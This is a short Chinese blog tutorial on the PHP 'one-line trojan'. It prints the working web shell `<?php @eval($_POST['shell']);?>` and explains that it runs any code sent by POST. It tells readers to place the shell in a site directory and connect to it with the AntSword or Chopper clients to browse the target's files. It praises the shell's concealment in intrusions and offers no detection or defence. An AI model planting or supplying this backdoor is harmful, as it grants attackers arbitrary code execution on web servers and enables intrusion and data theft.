一句话木马-php

一句话木马-php-飞一样的编程
飞一样的编程
擅长邻域:Java,MySQL,Linux,nginx,springboot,mongodb,微信小程序,vue

2021-01-06 22:30:02   270浏览 分类: Java

今天给大家分享的是:php一句话木马
一.介绍
一句话木马就是一段简单得代码,就这短短得一行代码,就能做到和大马相当得功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大得作用。

二.原理
<?php @eval($_POST['shell']);?>
这是php得一句话后门中最普遍得一种。它得工作原理是:
首先存在一个名为shell得变量,shell得取值为HTTP得POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面得内容。
实例:<?php @eval($_POST['shell']);?>
可以将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();

也可以用蚁剑或菜刀等工具连接(我这里用得是蚁剑):在url地址框中输入http://127.0.0.1/webshell.php,在连接密码框中输入shell

然后就可以看到目标站点目录下得文件了

行,今天就给大家分享到这里吧,您的一份支持就是我最大的动力,最后打个小广告,我们程序员在学习和工作中或多或少会遇到一些比较棘手的问题,也就所谓的一时半会解决不了的bug,可以来杰凡IT问答平台上提问,平台上大佬很多可以快速给你一对一解决问题,有需要的朋友可以去关注下,平台网址: https://www.jf3q.com

好文章就要一起分享哦!分享海报

此处可发布评论

评论(0

暂无评论,快来写一下吧
客服QQ 1913284695